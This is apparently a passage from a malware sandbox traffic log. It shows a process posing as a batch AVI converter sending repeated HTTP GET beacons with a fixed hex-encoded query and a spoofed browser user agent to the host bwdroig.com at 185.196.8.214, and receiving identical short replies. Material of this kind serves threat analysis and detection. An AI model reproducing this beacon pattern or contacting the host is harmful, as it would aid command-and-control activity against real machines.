Sep 11, 2024 21:06:42.796204090 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:43.040795088 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49739 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:43.161571980 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:43.864748001 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49740 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:43.990395069 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:44.711309910 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49741 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:44.834280968 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:45.545675993 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:45.657083035 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:45.897728920 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49742 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:46.034827948 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:46.723483086 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49743 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:46.849680901 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:47.537904024 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49744 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:47.663727045 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:48.660645008 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49745 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:48.786490917 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:49.481365919 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49746 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:49.608409882 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:50.341321945 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:50.453423977 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:50.706715107 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 49747 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:50.832351923 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:51.549276114 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 49748 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:51.678250074 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:52.389520884 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 49749 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:52.507091045 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:53.198771000 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:53.313535929 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:53.551271915 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 49750 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:53.679820061 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:54.402709961 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:54.516405106 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:54.763495922 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 49751 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:54.883301020 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:55.585000038 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 49752 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:55.709333897 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:56.428320885 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 49753 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:56.551981926 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:57.264182091 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 49754 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:57.381532907 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:58.076077938 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 49755 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:58.207561970 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:58.906440973 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 49756 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:59.039778948 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:59.848431110 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 49757 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:59.977205992 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:07:00.991636038 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:07:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 49758 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:07:01.116132975 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:07:01.839601040 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:07:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 49759 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:07:01.975826025 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:07:02.669235945 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:07:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.5 | 49760 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:07:02.790514946 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
